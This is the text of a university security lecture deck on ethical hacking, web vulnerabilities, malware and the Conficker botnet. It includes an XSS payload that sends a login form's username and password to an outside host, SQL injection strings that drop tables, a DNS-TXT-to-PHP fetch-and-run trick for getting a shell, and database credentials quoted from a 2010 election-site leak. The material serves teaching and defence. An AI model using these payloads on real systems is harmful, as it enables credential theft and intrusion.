(c) Boldizsár Bencsáth Rosszindulatú programok, botnetek Webes sérülékenységek Etikus hacking módszerek

Rosszindulatú programok, botnetek Webes sérülékenységek Etikus hacking módszerek

(c) Boldizsár Bencsáth ([email protected])

How a typical hacker compromises a system

Teljes integritás

Már próbálkoztak (b)

Információgyűjtés

Információ a rendszerről kijutott

Hiba kiaknázás- Információk próba

a rendszer belsejéről

Hiba kiaknázáspróba

Már próbálkoztak Hiba által shellhez jutás

Információszerzés a gép belső rendszeréről

Támadó bejutott

Egyik próba sikeres

Adminisztrátori jogok és infó kijutás

További célpontok és infogyűjtés

Rendszer veszélyben

Egész rendszer feltörése

Minden feltörve

Many attacks are successful by multiple steps! Pseudo-random number generators (PRNG)

2

The named version of BME DNS server

boldi@hbgyak:~$ dig version.bind @ns.bme.hu txt ch ; <<>> DiG 9.5.1-P3 <<>> version.bind @ns.bme.hu txt ch ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18923 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;version.bind. CH

TXT

;; ANSWER SECTION: version.bind. 0 CH

TXT

"9.5.1-P3"

;; AUTHORITY SECTION: version.bind. 0 CH

NS

version.bind.

Pseudo-random number generators (PRNG)

3

Version.bind So You can check the version of bind But You cannot be sure it is not faked As sysadmin, You might want to set this to something fake That will be security-through-obscurity But If You are lazy to upgrade whenever it is needed- at least, fake the version info…


4

Zone transfer – if allowed boldi@hbgyak:~$ dig crysys.hu @ns2.crysys.dc.hu in axfr ; <<>> DiG 9.5.1-P3 <<>> crysys.hu @ns2.crysys.dc.hu in axfr ;; global options: printcmd crysys.hu. 3000 IN SOA ns1.crysys.dc.hu. netadmin.ns1.crysys.dc.hu. 2003030439 43200 14400 2592000 3000 crysys.hu. 3000 IN NS ns1.crysys.dc.hu. crysys.hu. 3000 IN NS ns2.crysys.dc.hu. crysys.hu. 3000 IN A 152.66.249.135 crysys.hu. 3000 IN MX 10 shamir.crysys.hu. crysys.hu. 3000 IN MX 50 eternal.datacontact.hu. crysys.hu. 3000 IN TXT "Datacontact - your nameserver..." aggregator.crysys.hu. 3000 IN A 195.228.45.178 albifrons.crysys.hu. 3000 IN A 10.105.1.95 clamav.crysys.hu. 3000 IN A 152.66.249.132 cypio.crysys.hu. 3000 IN A 152.66.249.135 db.crysys.hu. 3000 IN A 152.66.249.139 deserecprj.crysys.hu. 3000 IN A 152.66.249.132 deserecvclt1.crysys.hu. 3000 IN A 152.66.249.131 deserecvclt2.crysys.hu. 3000 IN A 152.66.249.133 deserecvhost1.crysys.hu. 3000 IN A 152.66.249.130 deserecvirtclt1.crysys.hu. 3000 IN A 152.66.249.131 deserecvirtclt2.crysys.hu. 3000 IN A 152.66.249.133 ….


5

Zone transfer authorization boldi@fw:~$ dig crysys.hu @ns1.crysys.dc.hu in axfr ; <<>> DiG 9.5.1-P1 <<>> crysys.hu @ns1.crysys.dc.hu in axfr ;; global options: printcmd ; Transfer failed. Limiting zone transfer in named.conf: allow-transfer { 195.228.45.175; 152.66.249.135; … ) Pseudo-random number generators (PRNG)

6

News 2010… valasztas.hu- info leak – bad access rights http://valtor.valasztas.hu/valtort/jsp/ http://valtor.valasztas.hu/valtort/jsp/vlt_init_jsp_inc.txt http://valtor.valasztas.hu/valtort/jsp/vlt_start_jsp_inc.txt http://valtor.valasztas.hu/valtort/jsp/vlt_end_jsp_inc.txt Idézet: PoolSet.add("VALTORT",new Pool(new OraclePoolFactory("jdbc:oracle:thin:@172.31.100.104:1521: EKPD","valtort","valtort"),1,1,0,0,0,0,false,false)); van am szekuriti! http://209.85.135.132/search?q=cache:k0QfKgAgN1IJ:valtor. valasztas.hu/valtort/jsp/vlt_start_jsp_inc.txt+%22jdbc:oracle:t hin:%40172.31.100.104:1521:EKPD%22,%22valtort%22,%2 2valtort%22%29,&cd=3&hl=hu&ct=clnk&gl=hu&client=firefox -a Pseudo-random number generators (PRNG)

7

Google stored version – leak after deletion <%! String hstr(int i){return StatData.hstr(i);}%> <%! String dstr(java.sql.Date d){return StatData.dstr(d);}%> <%! String ifA(boolean l, String qstr, String[] param, int n) { return StatData.ifA(l, qstr, param, n);}%> <%! String ifA(boolean l, String qstr, String[] param, String link) { return StatData.ifA(l, qstr, param, link);}%> <%! String ifA(String qstr, String[] param, int n) { return StatData.ifA(qstr, param, n);}%> <% PoolSetObj pso = null; Connection c = null; PreparedStatement st[] = new PreparedStatement[0]; try { Class l_c = this.getClass(); java.lang.reflect.Field f = l_c.getDeclaredField("sqln"); int l_n = f.getInt(l_c); st = new PreparedStatement[l_n]; }catch (Exception e) {} PreparedStatement pst = null; ResultSet rs = null; String sql = null; try { if (PoolSet.get("VALTORT")==null) PoolSet.add("VALTORT",new Pool(new OraclePoolFactory("jdbc:oracle:thin:@172.31.100.104:1521:EKPD","valt ort","valtort"),1,1,0,0,0,0,false,false)); pso = PoolSet.getSetObj("VALTORT",funcName); c = (Connection)pso.getObj(); StatData.loadData(c); %> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-2"> Pseudo-random number generators (PRNG)

8

Example Web info leak video here End of part talking about info gathering /leak Security by obscurity -> is it good?


9

VULNS Main web vulns will be covered here XSS Code injection SQL injection


10

Case study: Hacker attack against valasztas.hu 2010


11

Offending links / XSS http://www.valasztas.hu/pv10vt/j24p.jsp?JLCS=3&NEV=Mas zop+maffi%F3z%F3i http://www.valasztas.hu/pv10vt/j24p.jsp?JLCS=22&NEV=Zsi desz++Magyar+Politikusb%FBn%F6z%F5+Sz%F6vets%E9g+ http://www.valasztas.hu/pv10vt/j24p.jsp?JLCS=20&NEV=Az %20egyetlen%20tiszta%20p%E1rt,%20a%20Jobbik

The parameter “NEV” is not used carefully on the server Possibility of Cross-site-scripting


12

What is XSS (cross site scripting)? Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.[1] Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner. Pseudo-random number generators (PRNG)

13

XSS Exploit scenarios Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security. Non-persistent: Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect. Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge. Persistent attack: Mallory posts a message with malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob.[16] [not too much difference between the two] Pseudo-random number generators (PRNG)

14

root@hbgyak:/data/html# more xss.php Hello (register_globals=On)


15

Xss.php?nev=boldi


16

http://10.105.1.54/xss.php?nev=%3CScRiPt%20%0D%0A% 3Ealert%281111%29;%3C/ScRiPt%3E


17


18

XSS vulnerability found by Acunetix scanner


19

Ha az egeret a user részre visszük,…


20

Nexon XSS: Have a look inside Felhasználó:


21

Neptun XSS found by Acunetix scanner


22

Details. http://neptun.bme.huZZ/?res=aa%22 ->
http://10.105.1.48/neptun/?res=%22%20onsubmit=%22%20i m=new%20Image;%20im.src=%27http://www.crysys.hu/nept un/%27%2bdocument.forms[0].uname.value%2b%27:%27% 2bdocument.forms[0].passwd.value Results in: method="post" action="include/setcookie.php?res=" onsubmit=" im=new Image; im.src='http://www.crysys.hu/neptun/'+document.forms[0].un ame.value+':'+document.forms[0].passwd.value"> Pseudo-random number generators (PRNG)

23


24


25

Code injection example Consider the following PHP code:

26

Php fopen error video shown here


27

SQL injection example Consider the following statement: statement = "SELECT * FROM ùsers` WHERE `name` = '" + userName + "';" Set userName to: ' or '1'='1 This results in: SELECT * FROM ùsers` WHERE `name` = '' OR '1'='1'; (will list all users) Or a more problematic attacking string: a';DROP TABLE ùsers`; SELECT * FROM ùserinfo` WHERE 't' = 't Results in: SELECT * FROM ùsers` WHERE `name` = 'a'; DROP TABLE ùsers`; SELECT * FROM ùserinfo` WHERE 't' = 't'; Some tricks: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ Pseudo-random number generators (PRNG)

28

SQL injection very very very short summary There are sql commands to save/load files and sometimes to start processes It’s very important not to let users to do arbitrary SQL commands Sqlmap videos shown here


29

Cross-site scripting example PHP example: http://www.crysys.hu/code2.php?user=boldi hello boldi http://www.crysys.hu/code2.php?user=%3Cscript%3Ealert%281%29%3C/s cript%3E (that means: http://www.crysys.hu/code2.php?user=<script>alert(1) ) Will result in an alert box. Any javascript code be embedded in this way (specified by the attacker). The code can be specified by the creator of the URL, the bad code is on the attacked server (crysys.hu php code) The script will be executed on the client, with the “environment” of the server host (e.g. here crysys.hu) – thus the script can get e.g. cookie information from the crysys.hu domain. (The javascript interpreter on the client computer will believe that the javascript code is specified by crysys.hu, not the URL creator!)


30

PHP in DNS: Ethical hacker conf material Van egy sérülékeny weboldalunk Tudunk parancsokat futtatni, de szeretnénk shellt A parancsfuttatás méretkorlátos: csak ~26 karakter hosszú max. Webes alkönyvtárakat nem tudjuk írni A sérülékeny gépről kifele semmilyen port nem nyitható A sérülékeny gép kívülről csak a 80-as porton érhető el A DNS viszont jól láthatóan működik


31

A sérülékeny script – bizonyítványnézegető (ez fonto $ more read.php Reading cert file
User controlled string

Shell command like exec, system, etc.

$res=`cat certs/$certname`; if (preg_match("/OK/",$res)) { echo("Cert loaded successfully: ".$res."\n
");} else { echo("bad certname (debug:<pre> file:$certname res:$res ) "); }


32

Nagyon meg van kötve a kezünk Nem rakhatunk fel reverse php shellt, mert nem tudunk írni a web könyvtárakba Reverse shell nem tud kapcsolatot nyitni kifele Még egy wget, tftp sem fut le, nem lehet „feltölteni” fájlokat Nincs root jogunk sem, nem lőhetjük le a web szervert Mit tegyünk?


33

Több problémát kell megoldani Milyen „átviteli közeget” tudunk használni a kommunikációra egy shellel? Milyen módon juttassuk el a shellt biztosító kódunkat és mi legyen az?


34

DNS Tunnel A shell „átviteli közege” nem lehet webes, hisz nem csinálhatunk új tartalmat Minden más port zárva Csak a DNS jön szóba átviteli közegnek A válasz adott: DNS Tunnel

Helyi DNS IP csomag

DNS kérés DNS server IP csomag

Feltöltött DNS tunnel alkalmazás IP csomag

DNS tunnel végpont Támadó üzemelteti


35

Mivel? Sok lehetőség van, de akadnak gondok is – – – – – –

Iodined: tun if– root jog kell mindkét oldalon Heyoka OzymanDNS Squeeza NSTX: tun virtuális interfész: root jog kell Dns2tcp


36

DNS2TCP http://www.hsc.fr/ressources/outils/dns2tcp/index.html.en http://www.hsc.fr/ressources/outils/dns2tcp/download/dns2tcp0.5.2.tar.gz

•A DNS2TCP-t válaszottuk •C implementáció, kis méret, portabilitás (könnyű felrakni) •Nincs szükség root jogra a kliensen •Csak fel kell töltenünk a kb. 30 kilobyte méretű programot és elindítani -rwxr-xr-x 1 root root 38832 Apr 18 08:06 dns2tcpc -rwxr-xr-x 1 root root 39844 Apr 18 08:06 dns2tcpd Pseudo-random number generators (PRNG)

37

Hogy töltsük föl a DNS tunnel alkalmazást?

Töltsük fel byte-onként! Így elfér 24 karakterben egy-egy parancs Pl.: login=;printf \\001 >>/tmp/a Ezesetben egy-egy tetszőleges bináris byte-ot tudunk fájlba irányítani Nagyon sok kérés kell egy fájlfeltöltéshez A script pár másodperces késleltetést is tartalmaz, így napokig töltögethetnénk Ez így nem fog menni


38

Használjuk a DNS-t!

Már a kód feltöltéshez is a DNS-t kell használnunk Helyezzünk PHP kódot DNS adatokba és bízzuk a PHP értelmezőre! Önkicsomagoló PHP kód: kód és adat egyhelyen Egy parancs kell csak szinte a feltöltéshez dig prj.hu in txt | php (kipróbálható!) Természetesen van más megoldás is, pl. adat DNS-ben, kicsomagoló kód külön


39

Hogy működik Minta lekérdezés: boldi@eternal:~$ dig prj.hu in txt ; <<>> DiG 9.7.3 <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34449 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN ;; ANSWER SECTION: prj.hu. 20 IN

TXT

TXT

"v=spf1 a mx -all"


40

Rakjunk bele php kódot ; <<>> DiG 9.7.3 <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34449 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN ;; ANSWER SECTION: prj.hu. 20 IN prj.hu. 20 IN

TXT

TXT TXT

" " "v=spf1 a mx -all"

Nézzük az eredményét!


41

Eredmény – rendben fut ; <<>> DiG 9.7.3 <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45532 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. ;; ANSWER SECTION: prj.hu. 20 IN prj.hu. 20 IN

IN

TXT

TXT TXT


"v=spf1 a mx -all" " hello world 6"

42

Gondok ; és idézőjel nem használható \; kerülne a helyére – Szerencsére a tag lezárás egyenértékű egy ;-vel – Természetesen lehetne utófeldolgozni is (\ kivétele sed-del) – Pl.

Idézőjel (”) sem használható, de aposztróf (’) igen Hibás: – prj.hu. ".2+2\;?> “

1

IN

TXT

"
Egy jó megvalósítás: – @ 5 TXT " "


43

Továbbá Egy TXT string csak 255 byte lehet Több TXT string is lehet egy bejegyzéshez A teljes rekord nem lehet 64k felett, udp query 4k felett Egyes tűzfalak limitálhatják a méretet Más speciális karakterek sem működnek. Vagy nehézkes megoldani Külön gond: A rekordok round robin kerülnek megjelentetésre (random sorrend)


44

Round robin válasz – random sorrend Tervezett kód: prj.hu. 20 IN prj.hu. 20 IN prj.hu. 20 IN Letöltéskor kapott adat: ;; ANSWER SECTION: prj.hu. 20 IN prj.hu. 20 IN prj.hu. 20 IN

TXT TXT TXT

" " " " " „

TXT TXT TXT

" " " " " "

Nyilvánvalóan a két kód nem vezet azonos eredményre.


45

Megoldás a sorrendproblémára – goto – csak PHP 5.3.0 fölött p3 5 TXT " … … A lefutás végén „die();”


46

Megoldások A különleges karaktereket tartalmazó kódot base64 kódolhatjuk, kicsomagolás után „eval” segítségével futtathatjuk Nagyobb stringeket szétvághatunk és darabokban kódoljuk egy-egy TXT rekordra, majd konkatenálunk TTL-t alacsonyan tartjuk, hogy frissíthessünk ha rossz a kód


47

Kezdjük összerakni

Dns2tcp DNS tunnel lefordítva Packer.php: Becsomagoljuk a DNS tunnel klienst és hosszabb parancsainkat DNS rekordokba (előkészítés) DNS kiszolgáló: Az eredményt be kell tölteni a DNS-be Futtatás: Egyetlen paranccsal aktiváljuk az eredményt a sérülékeny gépen Elvárt eredmény: shell hozzáférés


48

1. Use tools 2. Use your mind


49

1. Use tools Use tools as they are more up to date, than you Example: Qualys Browsercheck is a great tool to test your browser’s plugins


50


51


52

Network vulnerability scanners Target: A system, IP range, etc. Goal: To find vulnerable software components of the target in a fast and efficient way: Test against ten thousands of vulnerabilities in seconds Working method: Scans target for services identifies software version Performs basic tests to find out vulnerable services (e.g. is anonymous ftp login enabled?) Generally uses a number of “active plugins” to test target service against known vulnerabilities Uses a database that contains vulnerable software version numbers -> only matching this to the identified software version might result in large number of false positives Generally a lot more is incorporated (login support, password trial for weak pw., fuzzing tests, etc.) Pseudo-random number generators (PRNG)

53

Problems and advantages of vulnerability scanners

Problems Limited availability of free tools (Nessus: free, open source to closed source, limited free version) Vulnerability databases have to be kept updated Knowledge might be needed on the OS, Services to have accurate results (to avoid false positives) Attacks against custom settings, tools, software components is generally missing Generally, no “new attack” or system-wide vulnerability can be found The human knowledge is still needed Advantages Automatic running, fast scanning of multiple hosts against thousands of vulnerabilities Good looking automatic reports as audit material Most of the internet-wide scanning attacks can be prevented (those attackers also use standard attacks, databases) Pseudo-random number generators (PRNG)

54

Web vulnerability scanner Acunetix Web Vulnerability scanner is a great tool to find web attacks Even unknown ones (SQL injection, cross site scripting) The trial version only checks for XSS attacks

1. Acunetix XSS scanner VIDEO acunetix-webscan-1-v1.avi 04:20

2. NESSUS Homework: Install and test -Nessus -Eagle Eye Retina Community Ed. -Nmap Pseudo-random number generators (PRNG)

55

M MALWARE


56

Malware malicious and software software designed to infiltrate or damage a computer system without the owner's informed consent – – – – – – – – – –

Computer virus Worm Trojan horse Rootkit, backdoor Spyware Keylogger Adware Zombie,bot Fake antivirus product etc.


57

Computer Virus – why the name? A virus is: Not a full program, “cannot live alone” It reproduces itself, spreads. (“Infection”) Some transfer media, user interaction might be needed Makes nasty things (or not) Most so-called viruses is not a virus by this definition.

Worm: Can reproduce automatically (no user needed) Trojan Horse: The user thinks that the code is o.k., but it isn’t. Rootkit, backdoor: remains on the computer and hard to find Bot: participates in a distributed network for malicious activity. Pseudo-random number generators (PRNG)

58

Virus classification boot sector file infector macro virus encrypted virus stealth virus polymorphic virus (modifications to avoid identification: encryption, inserting dummy code) metamorphic virus (the same, but not inserting dummy code, instead, a-code-that-does-the-same)


59

Old-school file virus Modifies executable files, appends own code into them (how? - .com:simple .exe:a bit more difficult) Whenever the executable is loaded, the virus is started Might instantly check for one/more/all other executables (only .com/only .exe/all) and infect them Or just load into the memory, stay resident (TSR), and infect whenever we execute any program Might modify or “encrypt” itself at every infection – some “decryption” part is still the same (opportunity to recognize the virus) – 20 byte is enough for a basic encryption scheme – Tricky modifications can be done by the virus (e.g. xor ax,ax ; mov ax,0 ; sub ax,ax are the same) Pseudo-random number generators (PRNG)

60

Other viruses („virii”) Boot virus: infects boot sector (if you leave a floppy in the drive, it loads the code, and then,…) (now: USB autorun malware) Macro virus: Word/Excel macros affected Hardware level destroying virus: E.g. CIH bios clearing, or cd-rom firmware bugs BIOS virus: Part of the code is stored in the BIOS – disinfection might be hard (one of the latest tricks, difficult) Encrypting (ransom) malware: Encrypts all the files, decryption only when you pay.


61

Goals of the virus-writers Old times: just to show it is possible to write such code “proof of concept” (first virus ~1982) Be famous (or to collect- „vxers”) For fun Do harmful activities To write a better virus: harder to identify, harder to disinfect, faster spreading, Earn money ( spam, fake virus scanners, phishing, passoword and credit card no. collection, ransom (by encryption), fake-rogue security software, etc.


62

Potyogós virus - cascade Back from 1987 – the starting time of the new era for viruses 1071 byte First virus that caused mass infection in Hungary Encrypts itself in some form (no, not AES, nor RSA) Nasty code: after some time, characters started to fall off the screen TSR code http://www.youtube.com/watch?v=UWLg6tTeQRg Also check: http://kannan.jumbledthoughts.com/index.php/21-virus-and-othermalware-payload-videos/


63

Potyogós – in action


64

Binary version of polimer virus – only ~1000 bytes


65

Part of disassembled virus “polimer” polimer

proc

far

start:: jmp db db db db db db data_59 db db db data_60 data_61 loc_1::

loc_4 00h, 3Fh 7 dup (3Fh) 43h, 4Fh, 4Dh, 00h, 02h, 00h 40h, 00h, 8Dh, 36h, 80h, 00h 03h, 00h 14 dup (0) db 'A legjobb kazetta a POLIMER kaze' 'tta ! Vegye ezt ! ', 0Ah, 0Dh '$' 'ERROR', 0Ah, 0Dh, '$' dw 5 dw 147Dh

mov mov mov cld rep jmp

si,data_46e di,data_49e cx,30h

jmp

loc_10

jmp

loc_9

mov mov int

al,0 ah,0Eh 21h

mov mov int

dx,data_36e ah,1Ah 21h

movsb $-0BAh

; Clear direction ; Rep when cx >0 Mov [si] to es:[di]

loc_2:: loc_3:: loc_4::


; DOS Services ah=function 0Eh ; set default drive dl (0=a:)

; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx

66

Sample polymorphic code – the basis

Start: GOTO Decryption_Code Encrypted: ... lots of encrypted code ... Decryption_Code: A = Encrypted Loop: B = *A B = B XOR CryptoKey *A = B A=A+1 GOTO Loop IF NOT A = Decryption_Code GOTO Encrypted CryptoKey: some_random_number Pseudo-random number generators (PRNG)

From wikipedia 67

The polymorphic equivalent Start: GOTO Decryption_Code Encrypted: ... lots of encrypted code ... Decryption_Code: C=C+1 A = Encrypted Loop: B = *A C = 3214 * A B = B XOR CryptoKey *A = B C=1 C=A+B A=A+1 GOTO Loop IF NOT A = Decryption_Code C = C^2 GOTO Encrypted CryptoKey: some_random_number


68

Macro virus became very common in mid-1990s since – platform independent – infect documents – easily spread

exploit macro capability of office apps – executable program embedded in office doc – often a form of Basic

more recent releases include protection recognized by many anti-virus programs


69

Rogue security software -wiki

I guess You expected a shorter list,… The number of Rogue security software rose at an insane rate in the last few years Pseudo-random number generators (PRNG)

70

Limits of the malware A malware can fully control a computer Read memory, files Record keyboard, mouse, monitor activity Use webcam, microphone of the computer Find all archived information (emails, stored passwords, email, web history, stored files, etc.) A malware can hide itself very efficiently, currently it is almost always identifiable, but later…? Security schemes with additional hardware needed (smart card, token, OTP generator –with/without challenge) – remember: the computer is still controlled by the attacker No easy solution on untrusted terminal problem Therefore it is essential to avoid malware infections Of course, in practice, malware is not perfect, but: expect the worst case. Pseudo-random number generators (PRNG)

71

Worms replicating program that propagates over net – using email, remote exec, remote login

has phases like a virus: – dormant, propagation, triggering, execution – propagation phase: searches for other systems, connects to it, copies self to it and runs

may disguise itself as a system process concept seen in Brunner’s “Shockwave Rider” implemented by Xerox Palo Alto labs in 1980’s


72

Worm propagation model


73

Famous Worm Attacks

Code Red – July 2001 exploiting MS IIS bug – probes random IP address, does DDoS attack – consumes significant net capacity when active

Code Red II variant includes backdoor SQL Slammer – early 2003, attacks MS SQL Server – compact and very rapid spread

Mydoom – mass-mailing e-mail worm that appeared in 2004 – installed remote access backdoor in infected systems

Nowtimes: One after the other, hard to keep-up with new worms/botnets


74

Identification of malware Based on signatures (hard to make for polymorphic or metamorphic code) – – – –

In files (virus) In network traffic (worms, email viruses) In memory (infected hosts, e.g. botnet) Highly optimized (thousands of signatures should be detected)

Based on behavior (anomaly detection, checking code (e.g. for unpacking), heuristic algorithms – scoring)


75

Removal of malware First step: terminate running malware (not possible at every time…) – – – –

The malware might stop the removal tool The malware might detect our plans and do bad things (e.g. delete files) Some malware run in multiple tasks to avoid stopping Some malware are specially designed to download more malware – all should be removed

The files of the malware should be identified – – – –

Based on signatures Check auto-start applications Can be deep in the OS (modified kernel, modified BIOS) For traditional viruses: the code is injected into a binary executable

Remove the malware – Generally a simple file deletion is enough – In traditional virus, the code should be extracted from the host software: hard task, virus „killers” exist, but not for all virus – Backdoors, or re-infection trick made by the malware should also be cleared (not very common) – The vulnerability should also be handled to avoid re-infection – Some “junk” might remain • •

including text files with collected passwords!) Most malware has a mechanism to avoid multiple infections – might be a trick to protect hosts (e.g. modify exe header / might corrupt some files and others remain unaffected)


76

Future of malware Stuxnet is a great example for targeted attacks, where the goal of the adversary is to attack a very specific target In this case, the target was some industrial facilities (related to nuclear power) in Iran Advanced persistent threat (APT) usually refers to a group, such as a foreign nation state government, with both the capability and the intent to persistently and effectively target a specific entity. Virtualization, malware analysis, collaborative countermeasures, mobile phones, embedded systems: Lot of open questions in the field of malware…


77

Botnet RoBOT NETwork Gépek megfertőzése Fertőzött gépekből hálózat kialakítása Vezérlésre várakozás Támadás, vezérlésre (DDoS, spam, etc.) Frissítés További fertőzések stb. Legnagyobb botnetek mérete milliós nagyságrendű


78

Botnet history


79

DDoS – Botnet with IRC Attacker

Internet IRC server 1

IRC server n

Attacking computers, zombies Target Pseudo-random number generators (PRNG)

80

IRC-Internet Relay Chat

censored


81

IRC botnets IRC botnets: A controller can send messages to a channel The messages are received by the bots on the same channel (the servers relay the messages) The channel might be protected e.g. with password (of course, this can be recovered from active bots or by sniffing network activity: IRC is a cleartext protocol) The messages contain the commands of the controller/owner Bots can test the authenticity of the messages in some fashion


82

centralized vs. P2P botnet •IRC-based and other centralized botnets have drawbacks •A new trend for botnets is using P2P technologies •DHT (distributed hash tables) based techniques are common •However, e.g. delay might be higher for P2P botnets

Planning

Botnet detection

Delay

Survivability

Identification of the controller/ owner

centralized

easy (1)

easy (1)

small (3)

bad (1)

easy (1)

P2P

hard (3)

hard (3)

medium (2)

good (3)

hard (3)


83

How to determine the size of the botnet?

The size of the botnet is an important parameter. A large botnet can be more dangerous Counting individual IP addresses can give false results (e.g. bots behind NAT) The size of the botnet constantly changes – counting can also take time -> error IRC based botnets: activity of the bots might be visible, easy to count P2P botnets: e.g. doing queries in the DHT; sometimes the botnet uses IDs to identify individual bots – last ID might be queried


84

What to do against botnets Identification, size estimation Upgrade, patch against vulnerabilities (sometimes the patch gives hints to the attackers) Patch the vulnerable hosts remotely: illegal Find the owner of the botnet (hard task) Get control over the botnet (better botnets, harder to do) Support removal (by tools, knowledge): slow Eliminate upgrade possibilities (e.g domains, web pages) or control mechanism (disable communication, injecting code): harder and harder


85

Conficker botnet MS08-067 vulnerability is used A,B and C variants exist (as of 05/2009) Conficker is a DLL Using the vulnerability it inserts itself into the system as a system service Also uses USB drives to infect – DLL + rundll32.exe (turn off auto-run for USB drives!) Update: Time-seeded random domain names are used to download encrypted binaries by HTTP. Source: Analysis of honeynet.org


86

Vulnerability used by Conficker Vulnerability: NetpwPathCanonicalize() in netapi32.dll. On an established SMB channel (port 445), a path string is canonicalized. E.g. aaa\bbb\..\ccc -> aaa\bbb With a specially crafted path string it is possible to move beyond the start of a stack buffer and overwrite return address (not a classical buffer overflow, but similar) PEB shellcode is used, “00” bytes are avoided with an xor encryption routine


87

Conficker hooks some system calls E.g. DNS: to filter out for antivirus websites


88

NetpwCanonicalize hook First of all: no other botnets should be able to infect this computer Conficker: if “\..\” is found, then the “shellcode” is checked. Can decide if the exploit is coming from another conficker instance If a special “http://..” string is found in the data, conficker tries to use this to update itself. The behavior of the function is slightly modified ->ability to detect the bot Update checking: if RSA signature does not exist -> no update (SHA-1, 1024 bit RSA -> latest Conficker 4096 bit RSA + unknown hash) SHA-1 is from OpenSSL library Pseudo-random number generators (PRNG)

89

Upgrade mechanism Domain flux: For the update, conficker A/B generates 250250 random domain names, daily. Antivirus companies tried to preregister them Conficker.C uses 50.000 domain names, daily The PRNG is seeded by the current time Time synchronization: downloads web pages (google, yahoo,…) and uses the time data (day, month, year) in the HTTP response


90

Conficker domain generation algorithm


91

Conficker upgrade The generated domain name is checked for updates Updates are protected with RSA signatures – public key is in the bot itself – 1024 bit long in Conficker.A, 4096 bits for the other variants – The public key is a good signature to search for (bot identification)


92

Conficker blacklists Conficker uses blacklist of network addresses (IP numbers) to avoid identification – And to avoid scanning low-yield networks (expecting that most of the computers are patched here)

E.g. IP addresses of the following companies are included: Kaspersky Trend Micro Symantec McAfee F-Secure Avira Bitdefender Microsoft Corp. Microsoft Education Microsoft License Microsoft Visual Studios


93

Removal of Conficker Conficker detects removal tools and tries to avoid removal Conficker code is packed (polymorphic) on the network or in the file system However, on the target computer the code is unpacked while running – Easier to detect running processes

The code is stored under random file names – not fully random (depends on the variant)

Special flags and security settings on the file are used Every instance should be removed to avoid re-infection A trick: Conficker uses OS mutexes to avoid running multiple instances. The mutex generation is based on CRC. Might be used to avoid reinfections. Pseudo-random number generators (PRNG)

94

Hidden Conficker file


95

How to identify bots in Conficker DNS sinkhole – antivirus countermeasure Update DNS names used by conficker (getting queries from infected computers): although cannot inject any code into the botnet as RSA signature might fail, the querying computer can be identified. Scanning on infected computers (removal tools) – problematic Using the P2P approach of conficker


96

Conficker.C


http://mtc.sri.com/Conficker/addendumC/

97

(c) Boldizsár Bencsáth Rosszindulatú programok, botnetek Webes sérülékenységek Etikus hacking módszerek

Recommend Documents